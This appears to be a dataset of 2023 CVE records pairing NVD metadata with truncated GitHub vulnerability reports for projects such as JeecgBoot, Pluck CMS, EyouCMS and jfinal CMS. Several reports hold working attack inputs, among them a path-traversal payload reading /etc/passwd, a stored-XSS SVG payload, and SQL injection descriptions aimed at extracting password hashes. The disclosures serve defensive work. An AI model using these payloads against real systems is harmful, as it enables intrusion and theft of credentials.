{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/FasterXML/jackson-databind/issues/3972" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "ADC74502-D1EA-4E63-BBFF-8DE51013DCCE", "versionEndExcluding": "2.16.0", "versionEndIncluding": null, "version...
https://github.com/FasterXML/jackson-databind/issues/3972
[ "Issue Tracking" ]
github.com
[ "FasterXML", "jackson-databind" ]
# Stack overflow error caused by jackson serialization Map ## Description jackson before v2.15.2 was discovered to contain a stack overflow via the map parameter. ## Error Log ``` Exception in thread "main" java.lang.StackOverflowError at java.base/java.lang.String.startsWith(String.java:1470) at com.f...
Stack overflow error caused by serialization of `Map` with cyclic dependency -- NOT CVE
https://api.github.com/repos/FasterXML/jackson-databind/issues/3972/comments
76
2023-06-09T07:25:44Z
2023-11-16T01:29:27Z
https://github.com/FasterXML/jackson-databind/issues/3972
1,749,290,478
3,972
CVE-2023-34867
2023-06-14T16:15:20.277
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_property_hashmap_create at jerry-core/ecma/base/ecma-property-hashmap.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5084" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5084
[ "Exploit", "Issue Tracking" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32...
Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5084/comments
0
2023-06-05T11:59:55Z
2023-06-05T11:59:55Z
https://github.com/jerryscript-project/jerryscript/issues/5084
1,741,623,530
5,084
CVE-2023-34868
2023-06-14T16:15:20.323
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the parser_parse_for_statement_start at jerry-core/parser/js/js-parser-statm.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5083" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5083
[ "Exploit", "Issue Tracking" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32...
Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5083/comments
0
2023-05-31T12:11:34Z
2023-05-31T12:11:34Z
https://github.com/jerryscript-project/jerryscript/issues/5083
1,734,082,739
5,083
CVE-2023-34626
2023-06-15T16:15:09.347
Piwigo 13.7.0 is vulnerable to SQL Injection via the "Users" function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1924" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4B9AEE3-C9C5-4D20-BA38-9E5A2A64FABD", "versionEndExcluding": null, "versionEndIncluding": "13.7.0", "versionStartExcludin...
https://github.com/Piwigo/Piwigo/issues/1924
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Access the 'Users' function and use the filter function ![image](https://github.com/Piwigo/Piwigo/assets/67749472/e2d503b5-096f-4528-97f1-8b9b015cc222) Observe the request on Burp Suite ![image](https://github.com/Piwigo/Piwigo/assets/67749472/7e4280b1-3b93-4c36-9bd3-a03aa1645555) Manipulate the 'order' or 'e...
SQL Injection in the "Users" function of piwigo
https://api.github.com/repos/Piwigo/Piwigo/issues/1924/comments
0
2023-05-25T07:54:09Z
2023-05-29T10:27:38Z
https://github.com/Piwigo/Piwigo/issues/1924
1,725,285,095
1,924
CVE-2023-34845
2023-06-16T04:15:14.143
Bludit v3.14.1 was discovered to contain an arbitrary file upload vulnerability in the component /admin/new-content. This vulnerability allows attackers to execute arbitrary web scripts or HTML via uploading a crafted SVG file. NOTE: the product's security model is that users are trusted by the administrator to insert ...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/bludit/bludit/issues/1212#issuecomment-649514491" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/bludit/bludit/issues/1369#issuecomment-940806199" }, { "source": "cve@mitre.org", "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*", "matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/bludit/bludit/issues/1508
[ "Exploit", "Issue Tracking" ]
github.com
[ "bludit", "bludit" ]
### Describe your problem I found a cross-site scripting attack on the new content creating page http://localhost:800/admin/new-content it will execute the script in user context allowing the attacker to access any cookies or sessions tokens retained by the browser. Stored XSS, also known as persistent XSS, is the ...
version 3.14.1 is vulnerable to stored xss or ssrf via file upload.
https://api.github.com/repos/bludit/bludit/issues/1508/comments
1
2023-04-14T06:49:20Z
2024-03-03T08:29:18Z
https://github.com/bludit/bludit/issues/1508
1,667,617,923
1,508
CVE-2023-2431
2023-06-16T08:15:08.770
A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. Pods that use localhost type for seccomp profile but specify an empty profile field, are affected by this issue. In this scenario, this vulnerability allows the pod to run in unconfined (seccomp disabled) mode. This b...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking" ], "url": "https://github.com/kubernetes/kubernetes/issues/118690" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/QHmx0HOQ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "59A9CBF2-B94B-4311-AE41-6CEA2DA7E24B", "versionEndExcluding": "1.24.14", "versionEndIncluding": null, "versionStar...
https://github.com/kubernetes/kubernetes/issues/118690
[ "Issue Tracking" ]
github.com
[ "kubernetes", "kubernetes" ]
### What happened? A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. This issue has been rated LOW ([CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N)) (score: 3.4). If you have...
CVE-2023-2431: Bypass of seccomp profile enforcement
https://api.github.com/repos/kubernetes/kubernetes/issues/118690/comments
6
2023-06-15T14:42:32Z
2023-09-29T21:16:18Z
https://github.com/kubernetes/kubernetes/issues/118690
1,758,988,605
118,690
CVE-2023-34645
2023-06-16T18:15:09.367
jfinal CMS 5.1.0 has an arbitrary file read vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/57" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/jflyfox/jfinal_cms/issues/57
[ "Exploit", "Issue Tracking" ]
github.com
[ "jflyfox", "jfinal_cms" ]
Project address: https://github.com/jflyfox/jfinal_cms official website: http://mtg.jflyfox.com/ Enter the background, edit /template/includes/jquery.html in the template management , poc is as follows ${printFile('../../../../../../../../../../../../../../../etc/passwd')} ![image](https://github.com/jflyfox/jfin...
jfinal CMS v5.1.0 has a arbitrary file reading vulnerability exists
https://api.github.com/repos/jflyfox/jfinal_cms/issues/57/comments
0
2023-05-26T06:20:05Z
2023-05-26T06:20:05Z
https://github.com/jflyfox/jfinal_cms/issues/57
1,726,977,639
57
CVE-2023-34659
2023-06-16T18:15:09.437
jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4976" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "FEDFF952-7B1F-44EB-98BA-265CB22D6FB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
https://github.com/jeecgboot/jeecg-boot/issues/4976
[ "Exploit", "Vendor Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: JECG3.5.1 And JECG3.5.0 ##### 前端版本:vue3版?还是 vue2版? vue3 ##### 问题描述: After testing, it was found that the id parameter of the/jeecg-boot/jmreport/show interface of jeecg-boot has SQL injection and is unauthorized. ##### 截图&代码: Download and use https://github.com/jeecgboot/jeecg-boot Aft...
Unauthorized SQL injection in Jeecg3.5.0 and 3.5.1
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4976/comments
3
2023-05-25T02:08:54Z
2023-06-18T13:06:06Z
https://github.com/jeecgboot/JeecgBoot/issues/4976
1,724,968,984
4,976
CVE-2023-34660
2023-06-16T18:15:09.483
jjeecg-boot V3.5.0 has an unauthorized arbitrary file upload in /jeecg-boot/jmreport/upload interface.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4990" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "FEDFF952-7B1F-44EB-98BA-265CB22D6FB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
https://github.com/jeecgboot/jeecg-boot/issues/4990
[ "Exploit" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 目前确定影响:3.5.0 & 3.5.1(其它版本未验证) ##### 前端版本:vue3版?还是 vue2版? vue3版 ##### 问题描述: 经测试发现/jeecg-boot/jmreport/upload接口存在未授权任意文件上传,可以上传html文件造成存储型的XSS。 ##### 截图&代码: 下载使用https://github.com/jeecgboot/jeecg-boot项目源代码启动项目后, 入口:“报表设计器”-->"新建报表"-->"插入图片" 抓取包,获得上传接口,下面证明任意文件上传的存在。 ![image](https://github.com/...
/jeecg-boot/jmreport/upload接口存在未授权任意文件上传
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4990/comments
4
2023-05-28T14:23:40Z
2023-09-04T09:33:58Z
https://github.com/jeecgboot/JeecgBoot/issues/4990
1,729,493,887
4,990
CVE-2023-34657
2023-06-19T04:15:10.873
A stored cross-site scripting (XSS) vulnerability in Eyoucms v1.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the web_recordnum parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/43" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/weng-xianhu/eyoucms/issues/43
[ "Exploit", "Issue Tracking" ]
github.com
[ "weng-xianhu", "eyoucms" ]
There is a storage type cross site scripting vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.2 ![image](https://github.com/weng-xianhu/eyoucms/assets/81916226/21410c7b-37de-4a3d-abc8-6715b26747f9) ![image](https://github.com/weng-xianhu/eyoucms/assets/8...
EyouCMS v1.6.2 has stored xss
https://api.github.com/repos/weng-xianhu/eyoucms/issues/43/comments
0
2023-05-26T11:19:34Z
2024-03-22T06:50:31Z
https://github.com/weng-xianhu/eyoucms/issues/43
1,727,428,755
43
CVE-2023-34602
2023-06-19T06:15:09.047
JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryTableDictItemsByCode at org.jeecg.modules.api.controller.SystemApiController.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4983" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecgboot:*:*:*:*:*:*:*:*", "matchCriteriaId": "10C93285-2128-4E13-8F27-3BA2A037D4E6", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcludi...
https://github.com/jeecgboot/jeecg-boot/issues/4983
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.5.1以及之前的所有版本 ##### 前端版本:vue3版?还是 vue2版? vue3版 ##### 问题描述: 代码中存在SQL注入风险。尽管代码中添加SQL注入的过滤功能,但我们测试发现访问```org.jeecg.modules.api.controller.SystemApiController```类中的```queryTableDictItemsByCode```方法还是能通过特殊的字符串获取数据表中我们想要的数据,例如sys_user表中的用户名,密码和salt值。详细请见截图中的URL,其中“--”符号表示注释,通过该符号屏蔽后续SQL语句,其主要原因是mybatis中$...
SQL Injection in 3.5.1
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4983/comments
3
2023-05-26T13:33:03Z
2023-06-07T06:02:29Z
https://github.com/jeecgboot/JeecgBoot/issues/4983
1,727,638,418
4,983
CVE-2023-34603
2023-06-19T06:15:09.180
JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryFilterTableDictInfo at org.jeecg.modules.api.controller.SystemApiController.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4984" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecgboot:*:*:*:*:*:*:*:*", "matchCriteriaId": "10C93285-2128-4E13-8F27-3BA2A037D4E6", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcludi...
https://github.com/jeecgboot/jeecg-boot/issues/4984
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.5.1以及之前的所有版本 ##### 前端版本:vue3版?还是 vue2版? vue3版 ##### 问题描述: 与问题https://github.com/jeecgboot/jeecg-boot/issues/4983 类似,访问```org.jeecg.modules.api.controller.SystemApiController```类中的```queryFilterTableDictInfo```方法会触发SQL注入,根据需求获取数据库中的关键信息。主要原因还是绕过SQL注入检测方法后,Mybatis中的${XXX}存在SQL注入隐患。 Similar to the...
org.jeecg.modules.api.controller.SystemApiController.queryFilterTableDictInfo方法导致SQL注入
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4984/comments
1
2023-05-26T13:43:23Z
2023-09-04T09:36:15Z
https://github.com/jeecgboot/JeecgBoot/issues/4984
1,727,654,900
4,984
CVE-2020-20718
2023-06-20T15:15:10.627
File Upload vulnerability in PluckCMS v.4.7.10 dev versions allows a remote attacker to execute arbitrary code via a crafted image file to the the save_file() parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/pluck-cms/pluck/issues/79" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluckcms:4.7.10:dev:*:*:*:*:*:*", "matchCriteriaId": "F81490FE-D8E4-42ED-9D60-7D44697E52AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
https://github.com/pluck-cms/pluck/issues/79
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "pluck-cms", "pluck" ]
admin.php: ![image.png](https://xzfile.aliyuncs.com/media/upload/picture/20191011204910-85600e0a-ec25-1.png) language.php: ![image.png](https://xzfile.aliyuncs.com/media/upload/picture/20191011205325-1d6a1d44-ec26-1.png) save_file(): ![image.png](https://xzfile.aliyuncs.com/media/upload/picture/201910112...
File contains vuln pluck 4.7.10 dev version
https://api.github.com/repos/pluck-cms/pluck/issues/79/comments
2
2019-10-12T02:21:22Z
2019-11-01T18:58:02Z
https://github.com/pluck-cms/pluck/issues/79
506,117,765
79
CVE-2020-20725
2023-06-20T15:15:10.677
Cross Site Scripting vulnerability in taogogo taoCMS v.2.5 beta5.1 allows remote attacker to execute arbitrary code via the name field in admin.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/taogogo/taocms/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:2.5:beta1:*:*:*:*:*:*", "matchCriteriaId": "DD27C8D4-1FAB-4E1E-A7C7-9EF840F833E9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
https://github.com/taogogo/taocms/issues/2
[ "Exploit", "Issue Tracking" ]
github.com
[ "taogogo", "taocms" ]
First Enter the page: `http://127.0.0.1/taocms/admin/admin.php?action=frame&ctrl=iframes` and the payload is: <img width="986" alt="taocmsxss1-1" src="https://user-images.githubusercontent.com/41558659/66716536-592cd880-ee01-11e9-8eea-0a5dfc8e3411.png"> Then,we can see the result. <img width="1060" alt="taocmsxss1...
Cross Site Scripting
https://api.github.com/repos/taogogo/taocms/issues/2/comments
1
2019-10-13T13:37:13Z
2021-03-03T17:01:54Z
https://github.com/taogogo/taocms/issues/2
506,326,544
2
CVE-2020-20918
2023-06-20T15:15:10.810
An issue discovered in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary php code via the hidden parameter to admin.php when editing a page.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/pluck-cms/pluck/issues/80" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*", "matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
https://github.com/pluck-cms/pluck/issues/80
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "pluck-cms", "pluck" ]
**Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page** Vulnerability location: data\inc\functions.admin.php 531-535 line ![2019-10-21-15-39-25](https://user-images.githubusercontent.com/55776443/67186507-ce5c6700-f41a-11e9-968a-c89b5316af7b.png) Saves...
Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page
https://api.github.com/repos/pluck-cms/pluck/issues/80/comments
2
2019-10-21T07:55:24Z
2019-11-01T18:58:26Z
https://github.com/pluck-cms/pluck/issues/80
509,793,657
80
CVE-2020-20919
2023-06-20T15:15:10.857
File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/pluck-cms/pluck/issues/85" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*", "matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
https://github.com/pluck-cms/pluck/issues/85
[ "Exploit", "Issue Tracking" ]
github.com
[ "pluck-cms", "pluck" ]
pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme Demo: After the installation is successful, go to the management background. ![2019-10-22-10-14-37](https://user-images.githubusercontent.com/55776443/67256940-2ac39300-f4bc-11e9-909f-62b9cc3c387c.png) optio...
pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme
https://api.github.com/repos/pluck-cms/pluck/issues/85/comments
2
2019-10-22T03:15:36Z
2019-10-22T07:17:36Z
https://github.com/pluck-cms/pluck/issues/85
510,405,792
85
CVE-2020-20969
2023-06-20T15:15:10.900
File Upload vulnerability in PluckCMS v.4.7.10 allows a remote attacker to execute arbitrary code via the trashcan_restoreitem.php file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/pluck-cms/pluck/issues/86" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:-:*:*:*:*:*:*", "matchCriteriaId": "00EE308A-BD13-4E84-BB56-D890CB35E07A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
https://github.com/pluck-cms/pluck/issues/86
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "pluck-cms", "pluck" ]
Pluck-4.7.10 admin background exists a remote command execution vulnerability it happens when restore file from trashcan,and the restoring file has the same with one of the files in uploaded files dir the coding flaw is in file /pluck/data/inc/trashcan_restoreitem.php at line 54 ![image](https://user-images.gith...
Pluck-4.7.10 admin background exists a remote command execution vulnerability
https://api.github.com/repos/pluck-cms/pluck/issues/86/comments
3
2019-10-23T03:25:48Z
2019-11-01T19:00:21Z
https://github.com/pluck-cms/pluck/issues/86
511,047,937
86
CVE-2023-36093
2023-06-22T15:15:13.580
There is a storage type cross site scripting (XSS) vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.3
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/44" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*", "matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/weng-xianhu/eyoucms/issues/44
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
There is a storage type cross site scripting vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.3 poc: <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> ![微信截图_20230608160259](https://github.com/weng-xianhu/eyoucms/assets/59307191/b2441799-875...
EyouCMS v1.6.3 has stored xss
https://api.github.com/repos/weng-xianhu/eyoucms/issues/44/comments
0
2023-06-08T08:06:38Z
2024-03-22T06:48:29Z
https://github.com/weng-xianhu/eyoucms/issues/44
1,747,332,487
44
CVE-2023-36239
2023-06-22T19:15:09.037
libming listswf 0.4.7 was discovered to contain a buffer overflow in the parseSWF_DEFINEFONTINFO() function at parser.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/273" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.7:*:*:*:*:*:*:*", "matchCriteriaId": "18B4A4AA-DE48-45A4-AE25-1C83C1CDC743", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/libming/libming/issues/273
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
